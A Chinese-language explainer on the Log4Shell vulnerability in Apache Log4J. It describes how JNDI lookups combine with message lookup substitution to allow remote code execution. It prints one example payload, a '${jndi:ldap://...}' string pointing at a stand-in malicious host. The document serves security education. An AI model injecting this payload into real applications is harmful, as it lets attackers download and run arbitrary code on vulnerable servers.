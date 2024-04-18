Log4Shell 会影响由 Apache 软件基金会维护的开源记录库 Log4J。Log4J 是一个记录器，也是用于记录程序中信息和事件（例如错误消息和用户输入）的软件组件。

Log4J 并非独立的程序，而是一个代码包，开发人员可以将其插入其 Java 应用程序，而不必从头开始构建记录器。包括 Apple、Twitter、Amazon、Microsoft、Cloudflare、Cisco 等在内的大型组织都在其软件和服务中使用 Log4J。

Log4Shell 是源于 Log4J 的易受攻击版本如何处理两个相关功能：Java 命名和目录接口 (JNDI) 查找以及消息查找替换。每项功能本身都不会造成危害，但它们之间的相互作用却为黑客提供了有力的武器。

JNDI 是一款应用程序编程接口 (API)，帮助 Java 应用程序访问外部服务器上托管的资源。JNDI 查询是个命令，告诉应用程序要前往服务器并下载具体对象，例如一段数据或脚本。旧版本的 Log4J 2 会自动运行通过这种方式下载的所有代码。

信息查找替换允许用户和应用程序使用特定语法（${prefix:name}）在日志信息中向 Log4J 发送变量。当 Log4J 遇到此语法时，它会解析该变量并将值记录在日志中。例如，如果 Log4J 收到一条消息，内容为

${java:version}

它会找出设备上运行的当前 Java 版本，并会在日志中记录：“Java 版本 X.XX”。

换句话说，Log4J 不会将消息查找替换视为纯文本。它像命令一样对待它们，并根据它们所说的采取行动。黑客可以利用这一事实，向运行易受攻击的 Log4J 版本的应用程序发送恶意 JNDI 查找命令。例如，黑客可以向 Log4J 发送如下字符串：

${jndi:ldap://myevilwebsite.biz/maliciouscode}

当 Log4J 收到此消息时，它将通过访问 myevilwebsite.biz 的服务器并下载位于 /maliciouscode 的对象来解析该变量。这一过程将导致 Log4J 执行黑客藏匿在该位置的任意 Java 代码，通常是恶意软件。